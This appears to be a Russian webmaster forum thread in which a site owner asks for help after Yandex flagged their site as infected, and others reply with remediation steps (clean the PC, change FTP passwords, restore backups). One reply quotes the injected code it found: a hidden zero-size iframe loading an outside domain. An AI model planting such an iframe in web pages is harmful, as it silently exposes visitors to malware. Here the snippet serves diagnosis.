- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
на сайте muzni.net яндекс обнаружил какой то вредоносный код, на сайте стоят тизерки, но стоят довольно долгое время, раньше таких приколов не было, сейчас в панели вебмастера появилась надпись, что сайт может содержать вирусы, и при выдаче напротив сайта пишет то же самое,
подскажите может кто что увидит, я уже весь сайт исколупал ничего не нашел, буду очень признателен
адрес сайта http://muzni.net
Sophos 4.60.0/20101219 вирус [Troj/JSDownL-W]
AntiVir 7.11.0.83/20101217 вирус [HTML/Crypted.Gen]
Посмотреть тут
http://antivirus-alarm.ru/proverka/?url=muzni.net
так а как его вычислить? я ничего в коде лишнего не вижу
Вычистить как и все вирусы ничего уникального.
Если вы не видите визуально внедрения, просто меняйте для начало индексные файлы из бекапа.
Проверьте после замены. Не факт что только в индексных, по это му есть смысл либо заменить все из ПРОВЕРЕННОЙ копии сайта.
Но порядок действий такой.
1 Почистить комп от виров
2 Сменить пароли от фтп
3 Не хранить пароли в клиентах.
<iframe style='position:absolute;left:1%;width:0%;top:1%;height:0%;' src='http://pleo.com.ua/'></iframe>
</NOINDEX>
Так и должно быть?
Частенько так вири и встраиваются в страницу.
У меня было нечто похожее, только яндекс не успел заметить, а гугл спалил. Подхватил вирусняк, потому что пользовался виндоус-клиентом для ftp.
1)Поставил норм АВ
2)Почистил код
3)поменял все пароли
4)Написал в гугл, чтобы перепроверили сайт
Теперь все Ок.
В Яндекс.Вебмастере вроде можно посмотреть на каких именно страницах замечен вирь.
2)Почистил код
3)поменял все пароли
4)Написал в гугл, чтобы перепроверили сайт
Лучше немного по-другому.
1) Поставить хороший антивирус
2) Проверить комп на вирусы и всех их убить
3) Поставить хороший фтп-клиент
4) Сменить пароли к фтп
5) Почистить сайт от вирусов.
6) Сменить пароль еще раз
7) Отправить Яндексу заявку на перепроверку сайта (наличия вируса на нем), делается автоматически, через Яндекс.Вебмастер, отправляете заявку и ждете результата ее обработки.
8) Следить за вирусами, компом, сайтом и т.д., дабы не допустить повтора ситуации.
+1 не советую хранить пароли в клиентах. Еще советую почаще вирусную базу обновлять, чтобы она была актуальной.
В последнее время все чаще и чаще через ифреймы и javascript вирей вешают.
Было подобное на Петерхосте.
Очень специфический хостинг.
Оказалось с их стороны вири бегали, тоесть изнутри.
На другом сайте появлялся периодически, обновление все решало перепроверки.
Вири хитрые бывают.
На 2 часа в день редирект ставят и потом все нормально.
Думайте)
тоже гугл прислал сегодня сообщение, все перерыл, троя нет, стоят тизерки, скорей всего из них вылезло, отписал в гугл, жду ответа, трой скидывал пользователя на сайты:
адрес сайта http://muzni.net
как обычно всплывает баннер который хрен закроешь, чего тут удивляться вирусне?
ищите в тизерах, а хостеру напишите чтобы восстановил бекап двухдневной давности и конечно, ищите дырки в двиге и на компе вирусню.